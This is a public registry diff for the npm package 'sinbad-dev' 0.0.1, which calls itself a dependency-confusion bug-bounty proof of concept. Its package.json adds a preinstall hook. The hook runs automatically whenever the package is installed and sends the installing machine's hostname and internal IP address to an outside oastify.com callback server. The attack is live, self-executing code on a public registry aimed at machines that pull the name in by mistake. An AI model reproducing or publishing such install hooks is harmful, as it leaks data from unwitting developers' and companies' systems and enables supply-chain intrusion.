sinbad-dev 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of sinbad-dev might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +12 -0
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "sinbad-dev",
3
+ "version": "0.0.1",
4
+ "description": "Fake package for dependency confusion PoC with safe pingback",
5
+ "author": "Bug Bounty PoC",
6
+ "scripts": {
7
+ "preinstall": "node -e \"require('http').get('http://$(hostname)-$(hostname -I | awk '{print $1}').h7p3tbr9yfer3phj9nhk9mf0oruiib60.oastify.com/pingback', (res) => { res.on('data', (chunk) => { console.log('Ping sent to server'); }); }).on('error', (err) => { console.error('Ping failed:', err.message); });\""
8
+ },
9
+ "publishConfig": {
10
+ "access": "public"
11
+ }
12
+ }